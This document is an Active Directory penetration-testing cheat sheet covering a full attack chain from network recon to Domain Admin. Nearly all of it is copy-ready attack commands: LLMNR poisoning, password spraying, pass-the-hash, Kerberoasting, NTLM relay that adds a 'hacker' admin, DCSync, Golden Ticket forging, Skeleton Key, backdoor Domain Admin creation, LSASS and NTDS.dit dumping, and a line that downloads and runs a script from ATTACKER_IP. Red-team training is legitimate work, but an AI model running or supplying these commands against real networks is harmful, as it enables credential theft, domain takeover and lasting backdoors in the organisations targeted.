~/cheatsheets/AD Cheatsheet
Active Directory Full Attack Chain
Overview
1. Recon
2. Initial Access
3. AD Enumeration
4. Lateral Movement
5. Privilege Escalation
6. Domain Compromise
Credentials
6
Attack Phases
40+
Techniques
20+
Tools
DA
End Goal
01
Network Recon
02
Initial Access
03
AD Enumeration
04
Cred Dumping
05
Lateral Movement
06
Priv Escalation
07
Domain Admin
Key Tools by Phase
RECONDiscovery Tools
nmapmasscancrackmapexecnbtscanenum4linuxldapsearchBloodHound
EXPLOITInitial Access Tools
responderevil-winrmpsexec.pysmbclienthydrametasploit
CREDSCredential Tools
mimikatzsecretsdumphashcatjohnkerbruteGetNPUsers.py
PRIVESCAD Attack Tools
BloodHoundPowerViewSharpHoundRubeusimpacketPowerSploit
Common Attack Paths
PATH ALLMNR Poisoning → NTLMv2 Crack → SMB Access → BloodHound → DCSync
PATH BKerberoasting → Ticket Crack → Lateral Movement → DA Group Add
PATH CAS-REP Roasting → Hash Crack → Pass-the-Hash → secretsdump → Golden Ticket
PATH DAnonymous LDAP → Misconfig Enum → ACL Abuse (GenericWrite/ForceChangePassword) → DA
Network Scanning
SCANHost Discovery

Identify live hosts on the network before deep scanning.

# Ping sweep
nmap -sn 192.168.1.0/24
copy
# ARP scan (faster on LAN)
netdiscover -r 192.168.1.0/24
copy
# Masscan for large ranges
masscan 192.168.1.0/24 -p80,443,445,3389 --rate 1000
copy
SCANAD Port & Service Scan

Key AD ports: 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389/636 (LDAP), 3268 (GC), 3389 (RDP), 5985 (WinRM).

# Full AD port scan with scripts
nmap -sC -sV -p 53,88,135,139,389,445,636,3268,3389,5985,9389 -oN ad_scan.txt TARGET_IP
copy
# Full port scan then script scan
nmap -p- --min-rate 5000 TARGET_IP -oN allports.txt
copy
88=Kerberos389=LDAP445=SMB5985=WinRM3389=RDP
SMB & NetBIOS Enumeration
SMBSMB Enumeration
# Null session check
smbclient -N -L //TARGET_IP
copy
# CME SMB enum (null auth)
crackmapexec smb TARGET_IP -u '' -p '' --shares
copy
# enum4linux full scan
enum4linux -a TARGET_IP
copy
# nbtscan for NetBIOS names
nbtscan 192.168.1.0/24
copy
# Spider shares for interesting files
crackmapexec smb TARGET_IP -u USER -p PASS -M spider_plus
copy
LDAPLDAP Enumeration
# Anonymous LDAP bind
ldapsearch -x -H ldap://TARGET_IP -b "DC=domain,DC=local"
copy
# Get all users (authenticated)
ldapsearch -x -H ldap://TARGET_IP -b "DC=domain,DC=local" -D "user@domain.local" -w PASSWORD "(objectclass=person)"
copy
# windapsearch (cleaner output)
windapsearch -d domain.local --dc-ip DC_IP -u user@domain.local -p PASS --da
copy
DNS Enumeration
DNSDNS Recon & Zone Transfer
# Zone transfer attempt
dig axfr @DC_IP domain.local
copy
# Bruteforce subdomains
gobuster dns -d domain.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r DC_IP
copy
# dnsrecon
dnsrecon -d domain.local -n DC_IP -t axfr
copy
LLMNR / NBT-NS Poisoning
POISONResponder — LLMNR/NBT-NS Poisoning

Intercept broadcast name resolution to capture NTLMv2 hashes from machines trying to resolve hostnames.

# Start responder on interface
responder -I eth0 -dwv
copy
# Crack captured hash (NTLMv2)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
copy
Hashes saved to: /usr/share/responder/logs/ — look for NTLMv2 entries
Requires being on the same network segment. Very noisy — avoid in stealth engagements.
Username Enumeration
KERBEROSKerbrute — Username Enumeration

Enumerate valid domain usernames via Kerberos pre-auth without triggering lockout.

# Enumerate users
kerbrute userenum --dc DC_IP -d domain.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
copy
# Password spray (careful: lockout!)
kerbrute passwordspray --dc DC_IP -d domain.local users.txt Password123!
copy
Password spraying: check lockout policy first. Default is 5 attempts / 30 min.
Remote Access
WINRMEvil-WinRM — Remote Shell
# Connect with credentials
evil-winrm -i TARGET_IP -u Administrator -p Password123!
copy
# Connect with NTLM hash (pass-the-hash)
evil-winrm -i TARGET_IP -u Administrator -H NTLM_HASH
copy
# Upload / download files
upload /path/to/file.ps1 download C:\path\to\file
copy
SMBImpacket — psexec / smbexec / wmiexec
# psexec (SYSTEM shell, very noisy)
psexec.py domain.local/Administrator:Password@TARGET_IP
copy
# wmiexec (semi-interactive, less noisy)
wmiexec.py domain.local/user:Password@TARGET_IP
copy
# smbexec (no binary drop)
smbexec.py domain.local/user:Password@TARGET_IP
copy
# Pass-the-hash with impacket
psexec.py -hashes :NTLM_HASH domain/Administrator@TARGET_IP
copy
RDPRDP Access — xfreerdp
# Basic RDP connection
xfreerdp /v:TARGET_IP /u:Administrator /p:Password123!
copy
# With drive sharing and ignore cert
xfreerdp /v:TARGET_IP /u:USER /p:PASS /drive:share,/tmp /cert-ignore +clipboard
copy
# Pass-the-hash via RDP (Restricted Admin mode required)
xfreerdp /v:TARGET_IP /u:Administrator /pth:NTLM_HASH /cert-ignore
copy
BloodHound — Attack Path Mapping
BLOODHOUNDSharpHound Collection & BloodHound Analysis

BloodHound maps AD attack paths. SharpHound collects data; BloodHound visualizes it in Neo4j.

# Run SharpHound from target (PowerShell)
.\SharpHound.exe -c All
copy
# bloodhound-python from Kali (remote)
bloodhound-python -u user -p Password -d domain.local -ns DC_IP -c All
copy
# Start Neo4j + BloodHound
sudo neo4j start bloodhound &
copy
Useful queries: "Find Shortest Paths to DA" · "Find AS-REP Roastable Users" · "Find Kerberoastable Users" · "Shortest Path from Owned Principals"
PowerView — Manual Enumeration
POWERVIEWDomain Users, Groups & Computers
# Load PowerView
Import-Module .\PowerView.ps1 IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerView.ps1')
copy
# Domain info
Get-Domain Get-DomainController
copy
# Enumerate users
Get-DomainUser | select samaccountname,description,memberof,pwdlastset Get-DomainUser -SPN # Kerberoastable Get-DomainUser -PreauthNotRequired # AS-REP roastable
copy
# Enumerate groups
Get-DomainGroupMember -Identity "Domain Admins"
copy
# Local admin access (where can I go?)
Find-LocalAdminAccess
copy
# Find where a user is logged in
Get-DomainUserLocation -UserIdentity administrator
copy
ACLACL / Permission Enumeration

Find abusable ACLs: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword.

# Find interesting ACLs for current user
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "currentuser"}
copy
# Get ACL for a specific object
Get-DomainObjectAcl -Identity targetuser -ResolveGUIDs
copy
# Check who has GenericAll on Domain Admins
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "GenericAll"}
copy
CrackMapExec — Bulk Enumeration
CMECrackMapExec — Everything
# Check creds across subnet
crackmapexec smb 192.168.1.0/24 -u user -p Password123!
copy
# Dump logged in users
crackmapexec smb TARGET_IP -u user -p Pass --loggedon-users
copy
# Dump SAM database
crackmapexec smb TARGET_IP -u Administrator -p Pass --sam
copy
# Enum domain users via LDAP
crackmapexec ldap DC_IP -u user -p Pass --users
copy
# Execute command on target
crackmapexec smb TARGET_IP -u Admin -p Pass -x "whoami"
copy
Pass-the-Hash (PtH)
PTHPass-the-Hash — NTLM Auth

Use captured NTLM hash to authenticate without knowing the plaintext password.

# psexec PtH
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH domain/Administrator@TARGET_IP
copy
# evil-winrm PtH
evil-winrm -i TARGET_IP -u Administrator -H NTLM_HASH
copy
# CME PtH spray across subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLM_HASH --local-auth
copy
Format for Impacket: LMHash:NTHash — use aad3b435... as LM placeholder if LM is empty
Pass-the-Ticket (PtT) / Kerberos
PTTPass-the-Ticket — Rubeus
# List current tickets
.\Rubeus.exe triage
copy
# Dump TGT from memory
.\Rubeus.exe dump /service:krbtgt /nowrap
copy
# Import ticket (Rubeus)
.\Rubeus.exe ptt /ticket:BASE64_TICKET
copy
# Import ticket (Mimikatz)
kerberos::ptt ticket.kirbi
copy
# Impacket PtT (Linux)
export KRB5CCNAME=ticket.ccache psexec.py -k -no-pass domain.local/user@TARGET
copy
NTLM Relay Attack
RELAYNTLM Relay — ntlmrelayx

When SMB signing is disabled, relay captured NTLM auth to another host without cracking.

# Find hosts without SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
copy
# Disable SMB/HTTP in Responder.conf, then run both
responder -I eth0 -dwP ntlmrelayx.py -tf relay_targets.txt -smb2support
copy
# Relay to get interactive shell
ntlmrelayx.py -tf relay_targets.txt -smb2support -i
copy
# Relay and execute command
ntlmrelayx.py -tf relay_targets.txt -smb2support -c "net user hacker P@ss123! /add && net localgroup administrators hacker /add"
copy
Token Impersonation
TOKENToken Impersonation — Incognito
# Meterpreter token impersonation
load incognito list_tokens -u impersonate_token "DOMAIN\\Administrator"
copy
# PowerShell token steal (SeImpersonatePrivilege)
Invoke-TokenManipulation -ImpersonateUser -Username "domain\admin"
copy
Kerberoasting
KERBKerberoasting — Service Account Hashes

Request TGS tickets for SPN accounts. The ticket is encrypted with the service account's NTLM hash — crack offline.

# GetUserSPNs (Impacket)
GetUserSPNs.py domain.local/user:Password -dc-ip DC_IP -request
copy
# Rubeus Kerberoast
.\Rubeus.exe kerberoast /nowrap
copy
# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt
copy
# Crack TGS hash (mode 13100)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
copy
AS-REP Roasting
AS-REPAS-REP Roasting — No Preauth Accounts

Users with "Do not require Kerberos preauthentication" send AS-REP without auth — grab & crack.

# GetNPUsers (Impacket) — with creds
GetNPUsers.py domain.local/user:Password -dc-ip DC_IP -request
copy
# GetNPUsers — without creds (username list)
GetNPUsers.py domain.local/ -dc-ip DC_IP -usersfile users.txt -format hashcat
copy
# Rubeus AS-REP roast
.\Rubeus.exe asreproast /nowrap
copy
# Crack (mode 18200)
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
copy
-m 5600 = NTLMv2-m 13100 = Kerberoast-m 18200 = AS-REP-m 1000 = NTLM
ACL Abuse
ACLACL Abuse — GenericAll / GenericWrite / WriteDACL
# GenericAll on user → force password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
copy
# GenericAll on group → add yourself
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'youruser'
copy
# WriteDACL → grant yourself DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity youruser -Rights DCSync
copy
# GenericWrite on user → set SPN (then Kerberoast)
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/fake'}
copy
SeImpersonate / Potato Attacks
POTATOPotato Attacks — SeImpersonatePrivilege

If you have SeImpersonatePrivilege (common on service accounts, IIS, SQL), escalate to SYSTEM.

# Check privileges first
whoami /priv
copy
# PrintSpoofer (Server 2019 / Win10)
.\PrintSpoofer.exe -i -c cmd
copy
# GodPotato (universal)
.\GodPotato.exe -cmd "cmd /c whoami"
copy
# JuicyPotato (older systems)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net user hacker P@ss /add" -t *
copy
DCSync — Domain Hash Dump
DCSYNCDCSync — Dump All Domain Hashes

Simulate DC replication to pull all password hashes from AD. Requires DA or DCSync ACL rights (GetChanges + GetChangesAll).

# secretsdump (Impacket) — remote
secretsdump.py domain.local/Administrator:Password@DC_IP
copy
# secretsdump with hash (PtH)
secretsdump.py -hashes :NTLM_HASH domain/Administrator@DC_IP
copy
# Mimikatz DCSync (on target)
lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /all /csv
copy
Grab: Administrator, krbtgt, and all DA accounts. krbtgt hash enables Golden Ticket attacks.
Golden Ticket Attack
GOLDENGolden Ticket — Forge TGT with krbtgt Hash

With the krbtgt hash, forge a TGT for any user — valid for 10 years. Full domain persistence.

# Get domain SID
Get-DomainSID # PowerView whoami /user # or parse SID from here
copy
# Mimikatz Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ticket:golden.kirbi
copy
# Use the ticket
kerberos::ptt golden.kirbi dir \\DC\C$
copy
# Rubeus Golden Ticket
.\Rubeus.exe golden /rc4:KRBTGT_HASH /domain:domain.local /sid:S-1-5-21-... /user:Administrator /ptt
copy
Silver Ticket Attack
SILVERSilver Ticket — Forge TGS for Specific Service

With a service account NTLM hash, forge a TGS for that service. More stealthy than Golden Ticket — no DC contact needed.

# Mimikatz Silver Ticket (e.g., CIFS/SMB)
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /rc4:SERVICE_NTLM_HASH /target:server.domain.local /service:cifs /ptt
copy
Domain Persistence
PERSISTDomain Persistence Techniques
# Skeleton Key (in-memory patch — any user = "mimikatz" password)
misc::skeleton
copy
# AdminSDHolder abuse — persist ACL on protected groups
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity youruser -Rights All
copy
# Add user to Domain Admins
net group "Domain Admins" youruser /add /domain
copy
# Create backdoor admin
net user backdoor P@ssw0rd! /add /domain net group "Domain Admins" backdoor /add /domain
copy
NTDS.dit Extraction
NTDSNTDS.dit Offline Extraction

If you have DA access to the DC, extract NTDS.dit directly for offline hash extraction.

# ntdsutil method
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit
copy
# VSS shadow copy method
vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp
copy
# Extract hashes offline with secretsdump
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
copy
Local Credential Dumping
MIMIKATZMimikatz — LSASS Dump
# Dump plaintext creds from memory
privilege::debug sekurlsa::logonpasswords
copy
# Dump NTLM hashes only
sekurlsa::msv
copy
# Dump Kerberos tickets
sekurlsa::tickets
copy
# Dump SAM database
lsadump::sam
copy
# Remote mimikatz via CME
crackmapexec smb TARGET_IP -u Admin -p Pass -M mimikatz
copy
LSASSLSASS Memory Dump — Offline Analysis
# ProcDump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
copy
# comsvcs.dll method (no extra tools)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump LSASS_PID C:\temp\lsass.dmp full
copy
# Parse dump offline with pypykatz
pypykatz lsa minidump lsass.dmp
copy
# Or with mimikatz offline
sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords
copy
Credential Hunting
HUNTCredential Hunting — Files & Registry
# Search for password strings in files
findstr /si password *.txt *.xml *.ini *.config *.ps1 *.bat
copy
# Windows autologin creds in registry
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon
copy
# GPP (Group Policy Preferences) cpassword
findstr /S /I cpassword \\DC\SYSVOL\*.xml gpp-decrypt ENCRYPTED_CPASSWORD
copy
# PowerShell command history
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
copy
# Check Windows Credential Manager
cmdkey /list .\mimikatz.exe "vault::list"
copy
Hash Cracking Reference
CRACKHashcat — Mode Reference & Rules
1000 = NTLM 5600 = NTLMv2 13100 = Kerberoast 18200 = AS-REP 7500 = KRB5 TGS
# Rockyou wordlist attack
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt
copy
# With best64 rule
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
copy
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john --format=NT hash.txt
copy
# Identify hash type
hashid HASH hash-identifier
copy